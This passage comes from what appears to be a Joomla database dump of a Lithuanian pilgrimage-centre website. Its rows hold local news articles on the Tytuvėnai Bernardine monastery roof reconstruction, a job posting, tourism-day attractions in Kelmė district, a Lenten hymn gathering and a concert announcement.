aukštąjį universitetinį, aukštesnįjį arba jam prilygintą socialinių mokslų studijų srities, vadybos ir verslo administravimo krypties išsilavinimą;<br />3.4. mokėti dirbti kompiuteriu, kompiuterinėmis programomis: MS Word, MS Excel, MS Outlook, Internet Explorer;<br />3.5. sugebėti savarankiškai planuoti ir organizuoti savo veiklą ir rengti išvadas bei sklandžiai dėstyti mintis raštu ir žodžiu;<br /><br />IV. ADMINISTRATORIAUS (-ĖS) PAREIGAS EINANČIO DARBUOTOJO (-OS) PAVALDUMAS<br /><br />4. Administratoriaus (-ės) pareigas einantis darbuotojas (-a) tiesiogiai pavaldus įstaigos direktoriui ir asmeniškai atsako už tinkamą pareigybės aprašyme nustatytų funkcijų atlikimą bei savalaikį pavedamų užduočių įvykdymą.<br />Dokumentai priimami iki 2012 m. liepos 09 d. VšĮ „Tytuvėnų piligrimų centre“, Maironio g. 1, 86486 Tytuvėnai, Kelmės r. sav. arba el. paštu info@tytuvenai.eu.<br />Išsamesnė informacija ir konkurso sąlygos: 8-427-56223, 8-612-17117.<br /><br /><br /></p>','',-2,0,0,44,'2012-07-03 07:01:50',135,'','2014-04-27 15:05:19',135,0,'0000-00-00 00:00:00','2012-07-03 07:01:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,132,'','',1,112,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(112,196,'Belaukiant Šv. Kalėdų','belaukiant-v-kald','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/nelaukiant_sv_kaledu/pagr.jpg\" border=\"0\" /></td>\n<td valign=\"top\">\n<p>Kviečiame,</p>\n<p>Kiekvieną sekmadienį (gruodžio 2,9,16 d.) po Šv. Mišių, 13.15 val. į Tytuvėnų Bernardinų vienuolyną pasigėrėti senų kalėdinių žaisliukų ekspozicija, pasiklausyti raminančios muzikos, pagurkšnoti arbatos, dalintis gera nuotaika.</p>\n</td>\n</tr>\n</tbody>\n</table>','',0,0,0,44,'2012-12-03 19:06:25',135,'','2012-12-04 07:23:30',135,0,'0000-00-00 00:00:00','2012-12-03 19:06:25','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',7,0,192,'','',1,64,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',28,'*',''),(114,198,'Tytuvėnų Bernardinų vienuolyno atstatymas','tytuvn-bernardin-vienuolyno-atstatymas','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/tytuvenu_bernardinu_vienuolyno_atstatymas/pagr.jpg\" border=\"0\" /><br /></td>\n<td valign=\"top\">\n<p>2012 m. spalio 12 d. VšĮ ,,Tytuvėnų piligrimų centras’’ l.e.p. direktorė Sandra Sabaliauskienė ir UAB ,,Eigesa’’ direktorius Eimantas Baravykas pasirašė Tytuvėnų Bernardinų vienuolyno atstatymo darbų rangos sutartį. Bendra sutarties kaina  2989 844,35 Lt. Sutartis sudaryta stogo, fasadų, vidaus bei inžinerinių tinklų atstatymui. Visi darbai turi būti atlikti per 24 mėn.</p>\n</td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: justify; text-indent: 1cm;\">Rangovas pirmiausia pateikė  draudimo bendrovės laidavimo raštą, draudimo liudijimus, kuriais apdraudžiami statybos laikotarpiui  visi Sutartyje numatyti statybos ir montavimo darbai pilna atstatomąja verte nuo visų galimų rizikų , taip pat apdraudė civiline atsakomybe dėl žalos atlyginimo Užsakovui ir tretiems asmenims padarytos statybos objekte. Statybvietė  perduota 2012 m. spalio 19 d.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Rangovas UAB ,,Eigesa’’ dėjo visas pastangas, kad kuo greičiau būtų pradėti darbai. 2012 m. spalio 22 d. prasidėjo stogo atstatymo darbai. Šiuo metu stogo atstatymo darbus atlieka  subrangovas t.y. P. Račkausko firma ,,Agrotech’’.</p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_bernardinu_vienuolyno_atstatymas/2012_11_09_m.jpg\" border=\"0\" /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">VšĮ ,,Tytuvėnų piligrimų centras’’ labai patenkintas  subrangovo darbu, darbai vyksta greitai, visi suprantame, kad krituliai neigiamai veikia pastatą, todėl stogas turi būti  kuo greičiau uždengtas. Bendras stogo plotas yra apie 1470 m². Šiuo metu uždengta lentų paklotu apie 80 proc.  stogo dalies. Lentos yra užkeičiamos viena ant kitos, todėl krituliai į pastatą nepatenka.</p>\n<p> </p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_bernardinu_vienuolyno_atstatymas/2012_11_12_montuojamos_gegnes_m.jpg\" border=\"0\" /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_bernardinu_vienuolyno_atstatymas/2012_11_20_m.jpg\" border=\"0\" /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_bernardinu_vienuolyno_atstatymas/2012_11_29_m.jpg\" border=\"0\" /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_bernardinu_vienuolyno_atstatymas/2012_12_03_pastoge_m.jpg\" border=\"0\" /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_bernardinu_vienuolyno_atstatymas/2012_12_03_stogas_m.jpg\" border=\"0\" /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_bernardinu_vienuolyno_atstatymas/2012_12_03_tvarkoma_likusi_apie_20_proc_stogo_dalis_m.jpg\" border=\"0\" /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Planuojama visą stogą lentų paklotu uždengti  iki Šv. Kalėdų.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Tytuvėnų Bernardinų vienuolyno tvarkybos techninės priežiūros paslaugas teikia VĮ ,,Lietuvos paminklai’’. Techninis prižiūrėtojas užtikrina vykdomų statybos darbų techninę priežiūrą, užtikrina nuolatinę Rangovo atliekamų darbų kontrolę, rengia darbų atlikimo ataskaitas ir t.t…</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Draudimo kompanija yra priėmusi sprendimą išmokėti 1.880.987 Lt. draudimo išmoką. 2012 m. spalio 12 d. buvo išmokėta 705.445.30 Lt. Draudimo kompanijos sumos neužteks vienuolyno atstatymo darbams.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Visi norintys gali prisidėti prie mūsų didžiulės vertybės, Tytuvėnų Bernardinų vienuolyno, išsaugojimo ir  atgaivinimo.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Norintys plačiau sužinoti apie vienuolyno atstatymą, jo eigą visada yra laukiami VšĮ  Tytuvėnų piligrimų centre.<br /><br /><br /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Pagarbiai,</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">L.e.p. direktorė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Sandra Sabaliauskienė<br /><br /></p>',1,0,0,44,'2012-12-03 19:19:57',135,'','2012-12-04 07:09:34',135,0,'0000-00-00 00:00:00','2012-12-03 19:19:57','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',11,0,191,'','',1,4917,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',27,'*',''),(115,199,'Pasaulinės turizmo dienos minėjimas Kelmės rajone','pasaulins-turizmo-dienos-minjimas-kelms-rajone','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"250\"><img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/6.jpg\" border=\"0\" width=\"250\" /></td>\n<td valign=\"top\">\n<p>Kelmės rajono savivaldybė ir turizmo informacijos centrai kviečia visus kelmiškius ir rajono svečius paminėti Pasaulinę turizmo dieną ir apsilankyti žymiausiuose krašto lankytinuose objektuose.</p>\n</td>\n</tr>\n</tbody>\n</table>','<p><strong>Kelmė</strong></p>\n<p><img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/1.jpg\" border=\"0\" width=\"220\" /> <img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/2.jpg\" border=\"0\" width=\"220\" /> <img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/3.jpg\" border=\"0\" width=\"220\" /></p>\n<p>Kelmėje siūlome aplankyti Kelmės krašto muziejų (Dvaro g. 15, Kelmė), kuris įsikūręs Kelmės dvaro rūmuose. Muziejaus ekspozicijos išdėstytos trijuose pastatuose: rūmuose, vartuose ir svirne. Kelmės dvaro ansamblis – valstybės saugomas kultūros paveldo objektas, vertinamas kaip retai išlikusi baroko stiliaus Lietuvos provincijos dvaro sodyba. Iki šių dienų stovi devyni šios sodybos dvaro laikotarpio pastatai. Daugiau kaip 300 metų Kelmės dvarą valdė lenkų kilmės bajorai Gruževskiai.</p>\n<p>Muziejuje galima dalyvauti įvairiose edukacinėse programose, paskanauti indėniškos arbatos, pašaudyti iš lankų, užsiimti kita įdomia veikla.</p>\n<p><strong>Pasaulinės turizmo dienos proga rugsėjo 27 d., ketvirtadienį, edukacinė programa „Indėniški žaidimai“ visai šeimai – net 5 kartus per dieną: 10.00, 11.00, 12.00, 14.00 ir 16.00 valandomis. </strong></p>\n<p style=\"padding-left: 30px;\">Kelmės krašto muziejus<br />Dvaro g. 15, Kelmė <br />Tel. / faks. (8 427) 61 065       <br />Interneto svetainė www.kelmesmuziejus.lt<br />El. p. kelmesmuziejus@takas.lt</p>\n<p><img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/4.jpg\" border=\"0\" width=\"740\" /></p>\n<p> </p>\n<p><strong>Tytuvėnai</strong></p>\n<p><img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/5.jpg\" border=\"0\" width=\"220\" /> <img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/6.jpg\" border=\"0\" width=\"220\" /> <img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/7.jpg\" border=\"0\" width=\"220\" /></p>\n<p>Rugsėjo 27–29 dienomis kviečiame nemokamai aplankyti Švč. Mergelės Marijos bažnyčios ir bernardinų vienuolyno ansamblį. Tai pagrindinis Kelmės regiono turizmo traukos objektas, turintis didžiulę istorinę, meninę, kultūrinę, sakralinę išliekamąją vertę.</p>\n<p>Vienuolyno komplekse praleisti laiką gali įvairaus amžiaus piligrimai, keliautojai, turistai. Lankytojus sudomins išsami Tytuvėnų bernardinų vienuolyno istorija, išskirtinės meninės vertės darbai, pasakojimai apie vienuolių gyvenimą.</p>\n<p><strong>Pasaulinės turizmo dienos proga ansamblio lankymas rugsėjo 27–29 d. nemokamas!</strong></p>\n<p style=\"padding-left: 30px;\">Viešoji įstaiga „Tytuvėnų piligrimų centras“<br />Maironio g. 1, Tytuvėnai, Kelmės r.<br />Tel. / faks. (8 427) 56 223 <br />Interneto svetainė www.tytuvenai.eu<br />El. p. info@tytuvenai.eu</p>\n<p style=\"padding-left: 30px;\"> </p>\n<p><strong>Tytuvėnų regioninis parkas<br /></strong></p>\n<p><img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/8.jpg\" border=\"0\" width=\"220\" /> <img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/9.jpg\" border=\"0\" width=\"220\" /></p>\n<p>Kviečiame aplankyti Tytuvėnų regioninį parką, pasivažinėti dviračiais aplink Giliaus ir Bridvaišio ežerus nutiesta 13,5 km ilgio dviračių trasa. Pamatysite gražiausius apylinkių kraštovaizdžius, susipažinsite su įdomiais lankomais objektais, apylinkes galėsite apžvelgti nuo bokšto. Aplink Giliaus ežerą įrengtas pažintinis takas, keliaujantiems atveriantis savitą paežerių gamtą. Unikalus kraštovaizdis, gaivus ežerų vanduo bei apylinkių istoriją menantys kultūros objektai sudomins tiek aktyvaus, tiek pasyvaus poilsio mėgėjus.</p>\n<p><strong>Kviečiame užsukti į Tytuvėnų regioninio parko lankytojų centrą (Miško g. 3, Tytuvėnai) kuriame apžiūrėsite ekspoziciją, susipažinsite su regioninio parko veikla, lankytojus pasitiks gidas.</strong></p>\n<p style=\"padding-left: 30px;\">Tytuvėnų regioninio parko direkcija<br />Miško g. 3, Kelmės r.<br />Tel. / faks. (8 427) 59 031<br />Interneto svetainė www.tytuvenai.eu<br />El. paštas tytuvenurp@trp.lt</p>\n<p style=\"padding-left: 30px;\"> </p>\n<p><strong>Kražiai</strong></p>\n<p><img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/10.jpg\" border=\"0\" width=\"220\" /> <img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/11.jpg\" border=\"0\" width=\"220\" /> <img src=\"images/stories/naujienos/pasaulines_turizmo_dienos_minejimas_kelmes_rajone/12.jpg\" border=\"0\" width=\"220\" /></p>\n<p>Kviečiame aplankyti istorinį Kelmės krašto miestelį, kuriame  vienas iš istorinių paminklų – išlikęs renesansinis buvusios jėzuitų kolegijos pastatas (XVII a. pradžia). Šiuo metu čia įsikūręs M. K. Sarbievijaus kultūros centras ir Turizmo informacijos centras bei Žemaičių etnografinis muziejus.</p>\n<p><strong>Vytauto kalnelis </strong></p>\n<p>Vytauto kalnas įsiterpęs tarp Kražantės upės, Dausyno ežero ir  Medžiokalnio. Istorikai ir archeologai teigia, jog čia, šio kalno papėdėje, buvusi sena gyvenvietė, gyvavusi dar prieš 4000 metų. O XII a. ant šio kalno galėjusi stovėti karinė tvirtovė. Šiandien visi, norintys apžvelgti Kražius, kopia 50 akmeninių pakopų laiptais į Vytauto kalną. Čia, archajiškiausiame archeologijos paminkle, tebestovi dar 1843 m. iš griūvančios jėzuitų bažnyčios sienų plytų statyta mūrinė varpinė.</p>\n<p><strong>Medžiokalnis</strong></p>\n<p>Medžiokalnis apipintas legendomis bei pasakojimais, pasiekusiais mūsų dienas. Menamas šventasis ąžuolas – iš po kurio šaknų tryškęs šventas vanduo, netoli jo kūrenosi šventoji ugnis ir stovėjusi deivės Medeinės statula. Anot tautosakininko L. Jucevičiaus, rašiusio 1874 m., iš kalno ėję požemiai į Kražius ir Linkaučius. Medžiokalnyje jodinėdavę ir medžiodavę ponai. Iš čia ir kilęs Medžiokalnio vardas, buvęs Kražių dvaro žvėrynas. Čia ilsėdavosi karalius Žygimantas Augustas, kunigaikščiai Kęsgailos, Radvilos, Chodkevičiai.</p>\n<p>Šiandien Medžiokalnis – pamėgta Kražių jaunimo susibūrimo vieta. Čia kasmet švenčiamos Joninės, deginami laužai, rengiami koncertai ir įvairūs kiti renginiai.</p>\n<p><strong>Pasaulinės turizmo dienos proga Kražių M. K. Sarbievijaus kultūros centro Turizmo informacijos centras kviečia lankytojus rugsėjo 27–29 d. dalyvauti nemokamoje edukacinėje programoje „Kražių dėlionė“. Smagi pramoga visai šeimai!</strong></p>\n<p style=\"padding-left: 30px;\">Kražių M. K. Sarbievijaus kultūros centro Turizmo informacijos centras<br />Kolegijos g. 5, Kražiai, LT-86282 Kelmės r. sav.<br />Tel.:  8 622 21 321, (8 427) 58 155      <br />El. p. kraziai.turizmas@kraziai.lt<br /><br /></p>',0,0,0,44,'2012-09-25 10:46:23',135,'','2012-09-25 11:15:38',135,0,'0000-00-00 00:00:00','2012-09-25 10:46:23','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',17,0,193,'','',1,55,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',29,'*',''),(116,200,'VISĄ GAVĖNIOS LAIKĄ KVIEČIAME GIEDOTI KALVARIJOS KALNŲ','mieli-parapijieiai-vis-gavnios-laik-kvieiame-giedoti-kalvarijos-kaln','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/kalvarijos_kalnu_giedojimas.jpg\" border=\"0\" /><br /></td>\n<td valign=\"top\">\n<p>RENKAMĖS KETVIRTADIENIAIS<br />(VASARIO  14d., 21 d., 28 d.,KOVO  07d.,  14d., 21 d., 28 d.)<br />PO RYTO ŠVENTŲJŲ MIŠIŲ<br /><strong>Į VIENUOLYNO REFEKTORINĘ SALĘ</strong><br />KAD GALĖTUMĖTE AKTYVIAI ĮSIJUNGTI Į VIEŠPATIES KANČIOS APMĄSTYMĄ KAS TURITE PRAŠOME ATSINEŠTI<br />KALVARIJOS KALNŲ MALDYNĄ.</p>\n</td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: justify; text-indent: 1cm;\">DIDIJĮ ŠEŠTADIENĮ, KOVO 30d.16val. KALVARIJOS KALNAI BUS GIEDAMI BAŽNYČIOJE.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">KVIEČIAME DALYVAUTI.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\"> </p>\n<p style=\"text-align: justify; text-indent: 1cm;\">DIEVO GAILESTINGUMO MALDOS GRUPĖ</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">VšĮ „TYTUVĖNŲ PILIGRIMŲ CENTRAS”<br /><br /><br /></p>',1,0,0,44,'2013-02-20 05:55:13',135,'','2013-02-20 05:58:36',135,0,'0000-00-00 00:00:00','2013-02-20 05:55:13','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',3,0,189,'','',1,4508,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',25,'*',''),(117,201,'Tytuvėnų Bernardinų vienuolyno stogas pradedamas dengti čerpėmis','tytuvn-bernardin-vienuolyno-stogas-pradedamas-dengti-erpmis','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/tytuvenu_vienolynas_pradedamas_dengti_cerpemis/main.jpg\" border=\"0\" width=\"200\" height=\"267\" style=\"border: 0;\" /><br /></td>\n<td valign=\"top\">\n<p>Tytuvėnų Bernardinų vienuolynas po truputį atgauna savo ankstesnįjį vaizdą. Kaip ir buvo žadėta rangovų UAB ,,Eigesa‘‘  vienuolyno stogas iki Šv. Kalėdų buvo uždengtas lentų paklotu. Sausio mėnesį  prasidėjo vienuolyno vidaus atstatymo darbai t.y. vėdinimo, priešgaisrinė signalizacijos, vidaus elektros tinklų, kompiuteriniai telefono tinklų, vidaus buitiniai nuotekų tinklų įrengimai. Apie 20 proc. vienuolyno stogo jau yra apdengta čerpėmis, kita dalis pradėta dengti plėvele ir grebėstais. Šiuo metu yra atlikta darbų už  805129,17  litų sumą.</p>\n</td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_vienolynas_pradedamas_dengti_cerpemis/165700.jpg\" border=\"0\" style=\"border: 0;\" /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_vienolynas_pradedamas_dengti_cerpemis/121337.jpg\" border=\"0\" style=\"border: 0;\" /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">VšĮ ,,Tytuvėnų piligrimų centras‘‘  iniciatyva nuo vienuolyno atstatymo darbų pradžios t.y. nuo 2012 m. spalio 22 d. vyksta gamybiniai susirinkimai, kuriuose aptariama Tytuvėnų Bernardinų vienuolyno atstatymo darbų eiga, pastato remonto darbai žiemos metu , finansinės galimybės ir t.t. Gamybiniuose susirinkimuose visada dalyvauja Kelmės rajono savivaldybės, rangovų, subrangovų, techninės priežiūros, Kultūros paveldo departamento prie Kultūros ministerijos Šiaulių teritorinio padalinio, Tytuvėnų piligrimų centro, techninio projekto vykdymo priežiūrą atliekantys atstovai. 2013 m .balandžio 4 d. įvyko  jau septintasis gamybinis susirinkimas.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">VšĮ ,,Tytuvėnų piligrimų centras‘‘  patenkintas, kad darbai vyksta, planuojama dviejų mėnesių laikotarpyje baigti dengti  vienuolyno stogą čerpėmis. Džiaugiamės tuo, kad pavyko sumažinti santykinės drėgmės kiekį vienuolyno patalpose. Lapkričio mėnesį bendro naudojimo patalpose, kurios yra  antrame aukšte, santykinė drėgmė siekdavo 95 proc. šiuo metu yra apie 70 proc. Pirmame aukšte esančioje refektoriaus salėje  santykinė drėgmė sumažėjo net iki 54 proc.</p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_vienolynas_pradedamas_dengti_cerpemis/170516.jpg\" border=\"0\" width=\"740\" height=\"555\" style=\"border: 0;\" /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Esame dėkingi rangovam UAB ,,Eigesa‘‘ ir subrangovui UAB ,,Račkausko Agrotech‘‘, kurie prisidėjo prie vienuolyno patalpų šildymo.</p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_vienolynas_pradedamas_dengti_cerpemis/1a.jpg\" border=\"0\" width=\"740\" height=\"555\" style=\"border: 0;\" /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_vienolynas_pradedamas_dengti_cerpemis/2a.jpg\" border=\"0\" width=\"740\" height=\"555\" style=\"border: 0;\" /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/tytuvenu_vienolynas_pradedamas_dengti_cerpemis/3a.jpg\" border=\"0\" width=\"740\" height=\"555\" style=\"border: 0;\" /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Gerieji jūsų darbai bus užmiršti rytoj. Vis dėlto darykite gerus darbus! Tai, ką jūs kūrėte metais, gali būti sugriauta per trumpą laiką. Vis dėlto kurkite! Atiduodami pasauliui, ką turite geriausio, rizikuojate likti nuogi. Vis dėlto duokite tai, ką turite geriausio! <strong>Motina Teresė</strong>.<br /><br /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Pagarbiai,</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">L.e.p. direktorė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Sandra Sabaliauskienė<br /><br /></p>',1,0,0,44,'2013-04-11 07:38:24',135,'','2013-04-29 08:06:10',135,0,'0000-00-00 00:00:00','2013-04-11 07:38:24','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',7,0,188,'','',1,4482,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',24,'*',''),(118,202,'Balandžio 26 d. 20 val. Programa iš ciklo KETURI PLIUS. PILMATIS','balandio-26-d-20-val-programa-i-ciklo-keturi-plius-pilmatis','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/pilmatis/pilmatis_pil.jpg\" border=\"0\" width=\"200\" height=\"166\" style=\"border: 0;\" /><br /></td>\n<td valign=\"top\">\n<p>Balandžio 26 d. 20 val.</p>\n<p><strong>Tytuvuvėnų vienuolyno požemyje</strong></p>\n<p>Programa iš koncertų ciklo KETURI PLIUS</p>\n<strong>PILMATIS</strong></td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: center;\"> </p>\n<p style=\"text-align: justify; text-indent: 1cm; padding-left: 30px;\"><strong><br /></strong>Dalyvauja:<strong> aktorius Rolandas Dovydaitis (skaitovas)<br /><br />Gintaras Dzikolikas (klavišiniai)<br /><br />Tomas Lavickas (bosinė gitara)<br /><br />Eligijus Žilinskas (el. gitara)<br /><br />Gintautas Gascevičius (mušamieji)</strong><br /><br />Bilietų kaina 15 Lt.<br /><br />Tytuvėnų vienuolyno požemyje vietų kiekis ribotas, todėl bilietus siūlome užsisakyti iš anksto  mob. tel.  868692421<br /><br /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/pilmatis/pilmatis_all_pil.jpg\" border=\"0\" width=\"740\" height=\"1088\" style=\"border: 0;\" /></p>\n<p> </p>\n<p style=\"text-align: justify; text-indent: 1cm;\"> </p>',1,0,0,44,'2013-04-17 18:59:54',135,'','2013-04-17 19:03:06',135,0,'0000-00-00 00:00:00','2013-04-17 18:59:54','0000-00-00 